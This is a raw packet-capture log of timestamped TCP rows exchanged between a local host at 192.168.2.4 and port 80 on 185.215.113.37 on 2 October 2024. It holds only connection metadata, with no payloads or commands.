Oct 2, 2024 18:19:31.737054110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737059116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737077951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737082005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737107038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737140894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737155914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737169981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737184048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737199068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737205029 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737214088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737219095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737236023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737248898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737262011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737291098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737368107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737382889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737401009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737417936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737422943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737432957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737448931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737452984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737464905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737479925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737482071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737495899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737512112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737521887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737525940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737545013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737572908 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737584114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737598896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737613916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737626076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737627029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737642050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737656116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737658978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737695932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737709999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737720966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737725973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737741947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737756014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737763882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737770081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737780094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737812042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737921000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737936020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737951994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737967014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737972975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.737983942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.737988949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738018990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738023996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738039970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738054991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738070965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738076925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738106966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738128901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738130093 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738143921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738159895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738169909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738176107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738192081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738197088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738210917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738248110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738253117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738272905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738287926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738293886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738302946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738310099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738317966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738327026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738332987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738348961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738351107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738363028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738365889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738379955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738399982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738409996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738416910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738425016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738450050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738468885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738482952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738500118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738514900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738522053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738531113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738543987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738547087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738562107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738567114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738586903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738591909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738612890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738642931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738645077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738661051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738676071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738699913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738729000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738846064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738862038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738877058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738892078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738907099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738920927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738924026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738938093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738949060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738953114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738969088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738976955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738984108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.738996983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.738998890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.739022970 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.739051104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.739057064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.739073038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.739089012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.739098072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.739115000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.739131927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.868498087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.868659973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.868669987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.868721962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.868769884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.868787050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.868801117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.868814945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.868824959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.868855953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.868868113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.868907928 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.868907928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.868922949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.868944883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.868966103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869021893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869066000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869082928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869112968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869175911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869206905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869223118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869239092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869254112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869256973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869277000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869281054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869294882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869303942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869313955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869326115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869329929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869349003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869368076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869381905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869404078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869420052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869441986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869465113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869535923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869550943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869566917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869580984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869589090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869596004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869610071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869618893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869626999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869635105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869642973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869659901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869683981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869776011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869791031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869807959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869824886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869832039 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869849920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869873047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.869874001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869889021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869903088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.869956017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870038986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870054007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870069981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870079041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870084047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870100021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870110035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870114088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870129108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870141029 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870145082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870155096 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870161057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870188951 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870214939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870311975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870326996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870341063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870357037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870363951 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870373964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870387077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870400906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870405912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870417118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870424032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870431900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870443106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870462894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870479107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870547056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870563030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870578051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870592117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870596886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870606899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870623112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870625019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870647907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870683908 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870857954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870872974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870887041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870902061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870903015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870917082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870918989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870933056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870939970 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870948076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870955944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870963097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870979071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.870982885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.870992899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871004105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871009111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871023893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871030092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871046066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871057987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871083021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871197939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871213913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871228933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871254921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871275902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871449947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871465921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871480942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871494055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871501923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871510029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871525049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871531963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871541023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871545076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871556044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871568918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871572018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871587038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871592045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871611118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871639013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871769905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871783972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871797085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871812105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871819973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871826887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871843100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871848106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871857882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871866941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871872902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871886969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871893883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871902943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871917963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871923923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871932983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871948004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871952057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871963978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.871970892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.871994019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872016907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872158051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872173071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872188091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872203112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872205019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872216940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872226000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872231960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872236013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872246981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872265100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872293949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872453928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872468948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872483015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872498035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872507095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872513056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872528076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872535944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872541904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872555971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872561932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872571945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872585058 CEST	80	49737	185.215.113.37	192.168.2.4
